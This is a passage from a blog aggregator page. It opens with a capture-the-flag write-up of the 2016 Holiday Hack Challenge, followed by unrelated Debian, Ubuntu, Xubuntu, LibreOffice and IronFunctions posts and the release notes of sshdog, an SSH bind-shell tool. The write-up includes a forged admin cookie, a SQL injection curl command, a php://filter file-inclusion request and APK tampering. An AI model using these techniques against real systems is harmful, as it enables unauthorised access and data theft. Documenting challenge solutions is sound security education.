function check_access($db, $username, $users) {
  # Allow administrator to access any page
  if($username == 'administrator') {
    return;
  }

We now know that there’s probably an “administrator” user and that getting to that will allow us to access the edit.php page. Unfortunately, we don’t have credentials to log in as administrator, and we can’t use our arbitrary SQL to read the credentials until we have access. Stuck in a Catch-22? Not quite: who said we have to log in?

Earlier I foreshadowed the value of having access to the git repository for the site: session cookies are encrypted with symmetric crypto, and the key is available in the git repository:

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

This allows us to encrypt our own session cookie as administrator. I hacked together a short script to create a new AUTH cookie:

<?PHP
include('crypto.php');
print encrypt(json_encode([
  'username' => 'administrator',
  'date' => date(DateTime::ISO8601),
]));

Using my favorite cookie-editing extension to update my cookie, I quickly discover that the edit functionality is now available. Now, the edit page doesn’t provide an input field for the query, but thanks to Burp Suite, it’s easy enough to add my own parameter and edit the query. Based on getaudio.php, I know the schema for the audio table, so I craft a query to get it. Lacking an easy way to return the binary data directly (I can only execute this query within the context of an HTML page), I decide to return the MP3 encoded as a string. Base64 would probably be ideal to minimize overhead, but the TO_BASE64 function was added in 5.6 and I was too lazy to query the version from the database, so I encoded as hex instead.

I wanted the following query: SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio, so I POST’d to the following URL:

https://analytics.northpolewonderland.com/edit.php?id=1147b606-4d2f-4faa-b771-a55e03307367&name=foo&description=bar&query=SELECT+`id`,`username`,`filename`,hex(`mp3`)+FROM+audio

Then I ran the report with the saved report functionality, extracted the hex, and decoded it to reveal the other MP3 file. Based on the filename stored in the report, I saved it to my audio directory as discombobulatedaudio7.mp3. From the query results, we know these are the only 2 MP3s in the audio table, so it seems like it’s time to move on to the next server, but first I grabbed the passwords from the users table by updating the query again, just in case they might be useful later.
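For the decoding step, turning the hex column back into an MP3 is a quick job for xxd (a sketch, with hypothetical file names):

% xxd -r -p audio.hex > discombobulatedaudio7.mp3    # -r -p reverses a plain hex dump
% file discombobulatedaudio7.mp3                     # sanity check: should report MPEG audio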

Addendum: An Unintentional Vulnerability

After finishing all of the challenges, I happened to be looking back at this one when I discovered a 2nd vulnerability, which I suspect was not intended as part of the challenge. If you notice the file query.php does a number of input validation checks, each looking something like this:

if(!ctype_alpha($field)) {
  reply(400, "Field name can only contain letters!");
  die();
}

You’ll notice the reply function sets the HTTP status code and prints a message, then the script dies to prevent further execution. However, if you look further down (line 178), you’ll discover this check and query construction:

$type = $_REQUEST['type'];
if($type !== 'launch' && $type !== 'usage') {
  reply(400, "Type has to be either 'launch' or 'usage'!");
}

$query = "SELECT * ";
$query .= "FROM `app_" . $type . "_reports` ";
$query .= "WHERE " . join(' AND ', $where) . " ";
$query .= "LIMIT 0, 100";

Though it appears the author intended to limit type to the strings ‘launch’ and ‘usage’, the lack of a call to die() in the error handler results in the query being executed and results returned anyway! So we can inject into the type field and steal the mp3 files using a UNION SELECT SQL injection:

curl 'https://analytics.northpolewonderland.com/query.php' -H 'Cookie: AUTH=82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d87e572ba65ce9b6548b3494b6063a30265b71c76884152' -H 'Content-Type: application/x-www-form-urlencoded' --data 'date=2017-01-05&type=usage_reports` LIMIT 0 UNION SELECT id,username,filename,to_base64(mp3),NULL from audio  -- '

ads.northpolewonderland.com

The nmap results for this host were rather unremarkable: essentially, yes, it’s a webserver. Visiting the full URL from the APK, the site returns an image file directly (no link? I guess these banner ads are for brick-and-mortar stores), so navigating to the root, we find the administration site for the ad system.

Fortunately, I had happened upon a helpful elf who informed me about this “Meteor” javascript framework, and the MeteorMiner script for extracting information from Meteor. Unfortunately, I had never seen Meteor before, so I had no idea what was going on. After some braindead attempts to steal the credentials for an administrator (Meteor.users.find().fetch() returned nothing), I attempted to register a new account to see if I could get access to more interesting functionality that way, but was repeatedly rebuffed by the site.

I began to look into how Meteor manages users, and guessed that they were using the default user management package. According to the documentation, you could add users for testing by calling the createUser method:

Accounts.createUser({password:'matirwuzhere', username:'matir'})

It turns out that this worked to create a user, and even directly logged me in as that user. Unfortunately, all of the pages still gave me a response of “You must be logged in to access this page”. I clicked around and generated dozens of requests, and didn’t realize anything had meaningfully changed until I noticed that MeteorMiner was reporting a 5th member of the HomeQuote collection. Examining the collection in the javascript console revealed my prize: the path to an audio file, discombobulatedaudio5.mp3.

dev.northpolewonderland.com

Nmap gets us nothing here: just HTTP and SSH open. Visiting the webserver, we find nothing, literally. Just a “200 OK” response with no content. I can’t dirbuster (thanks Tom!), so how can I figure out what the web application might be doing?

Well, I have essentially two options: I can analyze the SantaGram APK, maybe using dex2jar and JAD (or another Java decompiler) to get semi-readable source, or I can run the APK in an emulator and capture requests with Burp Suite. For several reasons, I decide to go with the 2nd route, not the least of which is that I spend a lot of time in Burp during my day-to-day work, so I’ll be using the tools I’m most familiar with.
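In terms of setup, the emulator route needs little more than this (a sketch; the AVD name is hypothetical, and -http-proxy is a standard emulator flag):

% emulator -avd santagram-test -http-proxy http://127.0.0.1:8080 &    # route app traffic through Burp
% adb install SantaGram_4.2.apk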

So I fire up the Android emulator with the proxy set to my Burp instance, install SantaGram with adb, and start playing with the app. It turns out this is another place that we can use the guest:busyreindeer78 credentials to log in, but no matter what I do in the app, I can’t seem to see any requests for dev.northpolewonderland.com. Looking at res/values/strings.xml from the APK, I see an important entry adjacent to the dev.northpolewonderland.com entry:

<string name="debug_data_collection_url">
    http://dev.northpolewonderland.com/index.php</string>
<string name="debug_data_enabled">false</string>

Well, I suppose it’s not sending requests to dev because debug_data_enabled is false. Let’s change that to true and rebuild the APK:

% apktool b -o santagram_mod.apk santagram
% /tmp/apk-resigner/signapk.sh ./santagram_mod.apk
% adb install santagram_mod.apk
% adb uninstall com.northpolewonderland.santagram
% adb install signed_santagram_mod.apk

It turns out rebuilding the APK was more troublesome than I anticipated because it needed to be resigned, and then the resigned one couldn’t be installed because it used a different key than the existing one, so I needed to uninstall the HHC SantaGram and install mine. (Clearly I need to do more mobile assessments.)

With the debug-enabled version installed, it was time to play with the app some more. While debugging the lack of debug requests, I noticed several references to the debug code in the user profile editing class, so I decided to give that a try and noticed (finally!) requests to dev.northpolewonderland.com.

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 144
{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400}
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 20:09:37 GMT
Content-Type: application/json
Connection: close
Content-Length: 250
{"date":"20161230200937","status":"OK","filename":"debug-20161230200937-0.txt","request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":false}}

I noticed that the entire request is included in the response, plus a new field is added to the JSON: "verbose":false. Can we include that in the request, and maybe switch it to true? I send the request to Burp Repeater and add the verbose field, set to true:

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 159
{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true}

Unsurprisingly, the response changes, but we get far more than just details about our own debug message!

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 23:01:56 GMT
Content-Type: application/json
Connection: close
Content-Length: 465
{"date":"20161230230156","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161230230156-0.txt","filename.len":26,"request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true},"files":["debug-20161224235959-0.mp3","debug-20161230224818-0.txt","debug-20161230225810-0.txt","debug-20161230230155-0.txt","debug-20161230230156-0.txt","index.php"]}

You’ll notice we got a listing of all the files in the current directory (they must be cleaning that up periodically!), including an mp3 file. Could this be the next discombobulatedaudioN.mp3? I download the file and get something of approximately the right size, but it’s not clear which of the discombobulated files it will be. All of the others had a filename in the discombobulated format (at least nearby, if not directly) so I set this one aside to be renamed later.

dungeon.northpolewonderland.com

Initial nmap results for dungeon.northpolewonderland.com weren’t revealing anything too interesting. Visiting the webserver, I found what appears to be the help documentation for a Zork-style dungeon game. I remembered one of the elves offering up a copy of a game from a long time ago, so I went back and downloaded it.

I started playing the game briefly but, for as much as I love RPGs (I used to run several MUDs back in the 90s), I was impatient and wanted to get on with the Holiday Hack Challenge. I started with the obvious: running strings on both the binary and the data file, but that gave very little headway. I looked at Zork data file editors, but the first couple I found couldn’t decompile the provided data file (whether by accident, by design of the challenge, or because I picked the wrong tools, I have no idea), so that avenue proved fruitless.

However, on one of the sites where I was reading about reversing Zork games, I discovered a mention of a built-in debugger called GDT, the Game Debugger Tool. Among other things, GDT lets you dump all the information about NPCs, strings in the game, etc. Much like I would use GNU strings to get oriented in an unknown binary, I decided to use the GDT strings dump to find all of the in-game strings. Unfortunately, GDT requires a string index and dumps one string at a time. Not knowing how many strings there were, I picked 2048 as a starting point and wrote a little inline shell script to dump them. I discovered that it starts to crash after about 1279, and the last handful seemed to be garbage (OK, no bounds checking; I wonder what else I could do?), so I adjusted my 2048 to 1200 and tried again:

for i in $(seq 1 1200); do
    echo -n "$i: "
    echo -e "GDT\nDT\n$i\nEX\nquit\ny" | \
        ./dungeon 2>/dev/null | \
        tail -n +5 | \
        head -n -3
done

This produced a surprisingly readable strings table, except for some garbage at the end. (It appears the correct number of strings is 1027 for this particular game file.) At a quick glance, I notice some references to an “elf” near the end, while the rest seemed like pretty standard Zork gameplay. Most interesting seemed to be this line:

1024: >GDT>Entry:    The elf, satisified with the trade says - 
Try the online version for the true prize

Well, great: I need to find an online version, but I didn’t find a clue as to where it would be on the webpage with instructions, nor did the rest of the strings in the offline version offer a hint. When in doubt – more recon! Time for a full nmap scan (but I’ll leave scripts off in the interest of time):

Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.066s latency).
rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com
Not shown: 64989 closed ports, 543 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
11111/tcp open  vce
Nmap done: 1 IP address (1 host up) scanned in 46.16 seconds

Aha! Port 11111 is open. I imagine netcat will give us an instance of the dungeon game. My first question is whether the “Try the online version for the true prize” string says something different:

% nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>DT
Entry:    1024
The elf, satisified with the trade says - 
send email to "peppermint@northpolewonderland.com" for that which you seek.

That was surprisingly easy – I really expected to need to do more. Maybe it’s misleading? I send an email off to Peppermint and wait with anticipation for Santa’s elves to do their work.

It turns out it really was that easy! Moments later, I have an email from Peppermint with an attachment: it’s discombobulatedaudio3.mp3!

ex.northpolewonderland.com

One last server to go! This server is apparently for handling uncaught exceptions from the application. To figure out what kind of traffic it’s seeing, I decided to try to trigger an exception in the application running in the emulator (still going from my work on dev.northpolewonderland.com). I actually stumbled upon this by mistake: if you change the emulated device to a Nexus 6, the application crashes and sends a crash report to ex.northpolewonderland.com.

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 3860
{"operation":"WriteCrashDump","data":{...}}

I’ve omitted the contents of “data” in the interest of space, but it mostly contained the traceback of the exception that was thrown. Interestingly, the response indicates that crashdumps are stored with a PHP extension, so my first thought was to try to include PHP code in the backtrace, but that never worked out (the code wasn’t being executed). I’m assuming the PHP interpreter wasn’t turned on for that directory.

HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 81
{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "crashdump-QKMuKk.php"
}

It turns out there’s also a ReadCrashDump operation that you can provide a crashdump name and it will return the contents. You omit the php extension when sending the request, like so:

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 69
{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QKMuKk"}}

Given that I confirmed the crashdumps are in a folder “docs” relative to exception.php, I tried reading the “crashdump” ../exception to see if I could view the source, but that gives a 500 Internal Server Error. (Likely it keeps loading itself in an include() loop.) PHP, however, provides some creative ways to read data, filtering it inline. These pseudo-URLs for file opening result in different encodings and can be quite useful for bypassing LFI filters, extracting binaries containing non-printable characters, etc. I chose to use one that encodes a file as base64 to see if I could get the source of exception.php:

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 109
{"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=../exception"}}
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 31 Dec 2016 00:56:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3168
PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDog
…
oZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K

The base64 encoded output is a great sign. I decode it to discover, as expected, the contents of exception.php, which starts with this helpful hint:

<?php 
# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

So, there we have our final piece of the discombobulated audio: discombobulatedaudio6.mp3. This particular LFI was interesting for a few reasons: the use of chdir() to change directory instead of prepending the directory name, and the requirement that the file end in .php. Had they prepended the directory name, a filter could not have been used, because the filter must be at the beginning of the string passed to the PHP file-open functions (like require, include, fopen).

Part 5: Discombobulated Audio

Fixing the Audio

We now have 7 audio files. Listening to each one, you don’t hear much, but the overall tone suggests to me that the final audio has been slowed somewhat. So I open up Audacity and put all the files into one project. Then I used the option “Tracks > Align Tracks > Align End to End” to place the tracks in a series, concatenating the audio end to end.

I wasn’t sure if numerical order would be the right order, but the amplitude of the end of each piece looked similar to the amplitude of the beginning of the next piece and playing the audio sounded rather continuous, but still unintelligible, so I decided to proceed. (I was hoping nobody was going to make me try all 5040 permutations of audio!) I merged the tracks together (via Tracks > Mix and Render) and then changed the tempo (via Effects > Change Tempo) by about 600%. It still didn’t sound quite right, but was close enough that I could make out the message:

“Merry Christmas, Santa Claus, or as I have always known him, Jeff”

It wasn’t clear to me what to do with the audio, or how this would help to find the kidnapper, but since there’s still one door that I didn’t have the password to (the corridor behind Santa’s office), I decided to try and see if this helped with getting past the door.

Santa’s Kidnapper

I was honestly a little surprised when the “Nice” light flashed and I was past the last locked door! As soon as I was through, I was in a small dark room with a ladder going up. I actually hesitated to click up the ladder, because part of me didn’t want the game to be over. But without anything else to do in the game (except collect NetWars coins… that took a little extra time), I clicked up the ladder, expecting a nefarious villain, and finding… Dr. Who?

But why, Dr. Who, why? I can’t, for the life of me, imagine a reason to kidnap Santa Claus and take him back to 1978.

As told in his own words:

<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.

Well, actually, I think I have to agree with the Doctor. The world would be a much better place without the Star Wars Holiday Special, but the ends do not justify the means. However, Santa was returned in time to complete his Christmas rounds and deliver the toys via portal to all the white hat boys and girls of the world. (And perhaps a few of the grey hats too…)

on January 05, 2017 08:00 AM

Plasma 5.8.5 brings bug-fixes and translations from the month of December, thanks to the hard work of the Plasma team and the KDE Translation team.

To update, use the Software Repository Guide to add the following repository to your software sources list:

ppa:kubuntu-ppa/backports
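On the command line, that amounts to the same steps as in the backports announcement above:

sudo apt-add-repository ppa:kubuntu-ppa/backports
sudo apt update
sudo apt full-upgrade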

Instructions on how to manage PPAs and more info about the Kubuntu PPAs can be found in the Repositories Documentation.

on January 05, 2017 07:57 AM

January 04, 2017

For every request, IronFunctions would spin up a new container to handle the job, which, depending on the container and task, could add a couple hundred milliseconds of overhead.

So why not reuse the containers if possible? Well that is exactly what Hot Functions do.

Hot Functions improve IronFunctions throughput by 8x (depending on duration of task).

Hot Functions reside in long-lived containers dedicated to the same type of task; incoming workloads are fed into their standard input, and results are read from their standard output. In addition, permanent network connections are reused.

Here is what a hot function looks like. Currently, IronFunctions implements an HTTP-like protocol to operate hot containers, but instead of communicating through a TCP/IP port, it uses standard input/output.
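As a rough sketch of the idea (using simplified one-line framing rather than the real HTTP-like protocol), a hot function is just a long-lived loop over standard input/output:

#!/bin/bash
# A hot function stays resident in its container and answers many requests,
# instead of paying the container spin-up cost once per request.
while read -r request; do                  # one request per line (simplified framing)
  printf 'Hello World: %s\n' "$request"    # write each response to standard output
done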

So to test this baby, we deployed on 1 GB DigitalOcean instances (which is not much) and used Honeycomb to track and plot the performance.


Simple function printing "Hello World" called for 10s (MAX CONCURRENCY = 1).

Hot Functions have 162x higher throughput.


Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 1).
Hot Functions have 1.39x higher throughput.


By combining Hot Functions with concurrency we saw even better results:

Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 7)
Hot Functions have 7.84x higher throughput.


So there you have it, pure awesomeness by the Iron.io team in the making.

Also, a big thank you to the good people from Honeycomb for their awesome product, which allowed us to benchmark and plot (all the screenshots in this article are from Honeycomb). It’s a great and fast new tool for debugging complex systems by combining the speed and simplicity of time series metrics with the raw accuracy and context of log aggregators.

Since it supports answering arbitrary, ad-hoc questions about those systems in real time, it was an awesome, flexible, powerful way for us to test IronFunctions!

on January 04, 2017 08:50 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Debian LTS

I was allocated 10 hours to work on security updates for Debian 7 Wheezy. During this time I did the following:

  • I released DLA-741-1 on unzip. This was an easy update.
  • I reviewed Roberto Sanchez’s patch for CVE-2014-9911 in ICU.
  • I released DLA-759-1 on nss in collaboration with Antoine Beaupré. I merged and updated Guido’s work to enable the testsuite during build and to add DEP-8 tests.
  • I created a git repository for php5 maintenance in Debian LTS and started to work on an update. I added patches for two CVE (CVE-2016-3141, CVE-2016-2554) and added some binary files required by (currently failing) tests.

Misc packaging

With the strong freeze approaching, I had some customer requests to push packages into Debian and/or to fix packages that were in danger of being removed from stretch.

While trying to bring back uwsgi into testing I filed #847095 (libmongoclient-dev: Should not conflict with transitional mongodb-dev) and #847207 (uwsgi: FTBFS on multiple architectures with undefined references to uwsgi_* symbols) and interacted on some of the RC bugs that were keeping the package out of testing.

I also worked on a few new packages (lua-trink-cjson, lua-inotify, lua-sandbox-extensions) that enhance hindsight in some use cases and sponsored a rozofs update in experimental to fix a file conflict with inn2 (#846571).

Misc Debian work

Debian Live. I released two live-build updates. The second update added more options to customize the grub configuration (we use it in Kali to override the theme and add more menu entries) both for EFI boot and normal boot.

Misc bug reports. #846569 on libsnmp-dev to accommodate the libssl transition (I noticed the package was not maintained and asked for new maintainers on debian-devel). #847168 on devscripts for debuild, which started failing when lintian was failing (an unexpected regression). #847318 on lintian to not emit spurious errors for Kali packages (which was annoying with the debuild regression above). #847436 for an upgrade problem I got with tryton-server. #847223 on firefoxdriver, as it was still depending on iceweasel instead of firefox.

Sponsorship. I sponsored a new version of asciidoc (#831965) and of ssldump 0.9b3-6 (for libssl transition). I also uploaded a new version of mutter to fix #846898 (it was ready in SVN already).

Distro Tracker

Not much happening: I fixed #814315 by switching a few remaining URLs to https. I merged patches from efkin to fix the functional test suite (#814315); that was a really useful contribution! The same contributor started to tackle another ticket (#824912) about adding an API to retrieve action items. This is a larger project and needs some thought. I still have to respond to his latest patches (after two rounds already).

Misc stuff

I updated the letsencrypt-sh salt formula for version 0.3.0 and added the possibility to customize the hook script to reload the webserver.

The @planetdebian twitter account is no longer working since twitterfeed.com closed doors, and the replacement (dlvr.it) is unhappy about the RSS feed of planet.debian.org. I filed bug #848123 against planet-venus, since it does not preserve the isPermalink attribute in the guid tag.

Thanks

See you next month for a new summary of my activities.


on January 04, 2017 09:48 AM

New Tool: sshdog

David Tomaschik

I recently needed an encrypted, authenticated remote bind shell due to a situation where, believe it or not, the egress policies were stricter than ingress! Ideally I could forward traffic and copy files over the link.
I was looking for a good tool and casually asked my coworkers if they had any ideas when one said “sounds like SSH.”

Well, shit. That does sound like SSH and I didn’t even realize it. (Tunnel vision, and the value of bouncing ideas off of others.) But I had a few more requirements in total:

  • Encrypted
  • Authenticated
  • Bind (not reverse)
  • Windows & Linux
  • No Admin/Installation required
  • Can be shipped preconfigured
  • No special runtime requirements

At this point, I began hunting for SSH servers that fit the bill, but found none. So I began to think about Paramiko, the SSH library for Python, but then I’d still need the Python runtime (though there are ways to build a binary out of a Python script). I then recalled once seeing that Go has an ssh package. I looked at it, hoping it would be as straightforward as Paramiko (which can become a full SSH server or client in about 10 lines), but it’s not quite so simple. With the Go package, all of the crypto is handled for you, but you need to handle the incoming channels and requests yourself. Fortunately, the package provides code for marshaling and unmarshaling messages from the SSH wire format.

I decided that I would get better performance and more predictable behavior without needing to package the Python runtime, plus I appreciated the stability Go would provide (fewer runtime errors), so I began developing. What I ended up with is sshdog, and I’m releasing it today.

sshdog supports:

  • Windows & Linux
  • Configure port, host key, authorized keys
  • Pubkey authentication (no passwords)
  • Port forwarding
  • SCP (but no SFTP support)

Additionally, it’s capable of being installed as a service on Windows, and daemonizing on Linux. It uses go.rice to embed configuration within the resulting binary and give you a single executable that runs the server.

Example Usage

% go build .
% ssh-keygen -t rsa -b 2048 -N '' -f config/ssh_host_rsa_key
% echo 2222 > config/port
% cp ~/.ssh/id_rsa.pub config/authorized_keys
% rice append --exec sshdog
% ./sshdog
[DEBUG] Adding hostkey file: ssh_host_rsa_key
[DEBUG] Adding authorized_keys.
[DEBUG] Listening on :2222
[DEBUG] Waiting for shutdown.
[DEBUG] select...

Why sshdog?

The name is supposed to be a riff on netcat and similar tools, as well as an anagram of “Go SSHD”.

Please give it a try, and feel free to file bugs/pull requests on the GitHub project: https://github.com/Matir/sshdog.

on January 04, 2017 08:00 AM

January 03, 2017


What's yours?

Happy 2017!
:-Dustin
on January 03, 2017 10:36 PM
Now you can print your documents created in uWriter from your PC.

0.18 Print documents!

Setup: Enable easy access to your documents from a PC:

In your phone's Terminal, run this command:
ln -s /home/phablet/.local/share/uwp.costales/ /home/phablet/Documents/uWriter


The command as run in the Terminal
This creates a link between ~/Documents/uWriter and /home/phablet/.local/share/uwp.costales.

You only need to do this step once. Afterwards it's easy to navigate to the uWriter folder from your PC.


Print a document

Connect your phone or tablet to the PC via USB and navigate to the uWriter folder (~/Documents/uWriter):

Your documents are saved as *.html

Open a document with your favourite web browser.
Your document opened (in this case, in Firefox)
Print it!
That's all :) Enjoy it!
on January 03, 2017 07:14 PM

I’m specifically looking for example files in these formats:
OS/2 Metafile (.met)
PICT (Mac’s precursor to PDF) https://en.wikipedia.org/wiki/PICT

Also useful might be:
PCD – Kodak Photo CD
RAS – Sun Raster Image

I’m trying to evaluate whether LibreOffice should keep support for them (specifically, whether the support is good). Unfortunately I can only generate the images using LibreOffice (or sister projects), which doesn’t really provide a great test.

Please either:
* Provide a link in a comment below
* Email me B @ (If emailed, please mention if I can share the image publicly)

If I find the support works great I’d try to integrate a few of them into LO tests so we make sure they don’t regress.

Thank you! [Update: the files are now part of LibreOffice’s test server.]

on January 03, 2017 02:47 PM

January 02, 2017

So that was 2016! Here’s a summary of what I got up to on my computer(s) in December, a check of how I went against my plan, and the TODO list for the next month or so.

With a short holiday to Oslo, Christmas holidays, Christmas parties (at work and with Alexander at school, football etc.), travelling to Brussels with work, birthdays (Alexander & Antje), I missed a lot of deadlines, and failed to reach most of my Free Software goals (including my goals for new & updated packages in Debian Stretch – the soft freeze is in a couple of days). To top it all off, I lost my grandmother at the ripe old age of 93. Rest in peace Nana. I wish I could have made it to the funeral, but it is sometimes tough living on the other side of the world to your family.

Debian

Ubuntu

  • Added the Ubuntu Studio testsuites to the package tracker, and blogged about running the Manual Tests.

Other

Plan status & update for next month

Debian

Before the 5th January 2017 Debian Stretch soft freeze I hope to:

For the Debian Stretch release:

Ubuntu

  • Add the Ubuntu Studio Manual Testsuite to the package tracker, and try to encourage some testing of the newest versions of our priority packages. – Done
  • Finish the ubuntustudio-lightdm-theme, ubuntustudio-default-settings transition including an update to the ubuntustudio-meta packages. – Still to do
  • Reapply to become a Contributing Developer. – Still to do
  • Start working on an Ubuntu Studio package tracker website so that we can keep an eye on the status of the packages we are interested in. – Still to do
  • Start testing & bug triaging Ubuntu Studio packages.
  • Test Len’s work on ubuntustudio-controls

Other

  • Continue working to convert my Family History website to Jekyll – Done
  • Try and resurrect my old Gammon one-name study Drupal website from a backup and push it to the new GoONS Website project.
  • Give JMRI a good try out and look at what it would take to package it.

on January 02, 2017 10:58 PM

Enigma machine photo by Alessandro Nassiri [CC BY-SA 4.0], via Wikimedia Commons

The Ubuntu Archive and CD/USB images use OpenPGP cryptography for verification and integrity protection. In 2012, a new archive signing key was created, and we started to dual-sign everything with both the old and new keys.

In April 2017, Ubuntu 12.04 LTS (Precise Pangolin) will go end of life. Precise was the last release signed with just the old signing key. Thus, when Zesty Zapus is released as Ubuntu 17.04, there will no longer be any supported Ubuntu release that requires the 2004 signing keys for validation.

The Zesty Zapus release is now signed with just the 2012 signing key, which is a 4096-bit RSA key. The old 2004 signing keys, which were 1024-bit DSA keys, have been removed from the default keyring and are no longer trusted by default in Zesty and up. The old keys are available in the removed-keys keyring in the ubuntu-keyring package, for example in case one wants to verify things from old-releases.ubuntu.com.
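As a hedged illustration of what such a check might look like programmatically (gpgv is of course the usual tool, and the keyring path below is an assumption based on the ubuntu-keyring package layout), one could verify an old Release file against its detached Release.gpg signature in Go with golang.org/x/crypto/openpgp:

package main

import (
	"fmt"
	"log"
	"os"

	"golang.org/x/crypto/openpgp"
)

func main() {
	// The removed-keys keyring; this path is an assumption for illustration.
	keyringFile, err := os.Open("/usr/share/keyrings/ubuntu-archive-removed-keys.gpg")
	if err != nil {
		log.Fatal(err)
	}
	defer keyringFile.Close()
	keyring, err := openpgp.ReadKeyRing(keyringFile)
	if err != nil {
		log.Fatal(err)
	}

	// A Release file and its armored detached signature, e.g. fetched
	// from old-releases.ubuntu.com.
	signed, err := os.Open("Release")
	if err != nil {
		log.Fatal(err)
	}
	defer signed.Close()
	sig, err := os.Open("Release.gpg")
	if err != nil {
		log.Fatal(err)
	}
	defer sig.Close()

	signer, err := openpgp.CheckArmoredDetachedSignature(keyring, signed, sig)
	if err != nil {
		log.Fatal("verification failed: ", err)
	}
	fmt.Printf("good signature from key %s\n", signer.PrimaryKey.KeyIdString())
}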

Thus the signing key transition is coming to an end. Looking forward, I hope that by the 18.04 LTS time-frame the SHA-3 algorithm will have made its way into the OpenPGP spec and that we will possibly start a transition to 8192-bit RSA keys. But this is just wishful thinking, as the current key strength, algorithm, and hashsums are deemed to be sufficient.
on January 02, 2017 01:54 PM

January 01, 2017

At the beginning of 2016, the Xubuntu team started a process to transition the project to being council-run rather than having a single project leader. After careful planning, writing, and approving the general direction, the team was ready to vote for the first three members of the project's council.

In this article we explain what the new Xubuntu Council is and who the council members are.

What is the Xubuntu Council about?

The purpose of the council is very similar to the purpose of the former Xubuntu Project Leader (XPL): to make sure the direction of the project stays stable, in adherence to the Strategy Document, and to be responsible for making long-term plans and decisions where needed.

The two main differences between a council and the XPL, both favoring the council approach, are:

  • The administrative and bureaucratic work of managing the project is split between several people. This means more reliability and faster response times.
  • A council, with a diversity of views, can more fairly evaluate and arbitrate disputes.

Additionally, the council will stay more in the background in terms of daily decisions; it does not have a casting or veto vote in the way that the XPL had. We believe this lets us embrace the expertise in the team even more than we did before. The council also acts as a fallback to avoid the deadlocks that a single point of failure like “an XPL gone missing” could produce.

If you wish to learn more about the council, you can read about it in the Xubuntu Council section of our contributor documentation.

Who is in the Council?

On August 31st, Simon Steinbeiß announced the results of the vote by Xubuntu project members. The first Xubuntu Council contains the following members:

  • Sean Davis (bluesabre), the council chair and the Xubuntu Technical Lead
  • Simon Steinbeiß (ochosi), the Xubuntu Artwork Lead and a former XPL
  • Pasi Lallinaho (knome), the Xubuntu Website Lead and a former XPL and former Xubuntu Marketing Lead

As the titles alone can tell you, the three council members all have a strong history with the Xubuntu project. Today we want to go a bit deeper than just these titles, which is why we asked the council members a few quick questions so you can start to get to know them.

Interviewing the Council

What inspired you to get involved with the Xubuntu project?

Sean: I started using Xubuntu in 2006 (when it was first released) and used it all throughout college and into my career. I started reporting bugs to the project in 2012 and contributing to the Ubuntu community later that year. My (selfish) inspiration was that I wanted to make my preferred operating system even better!

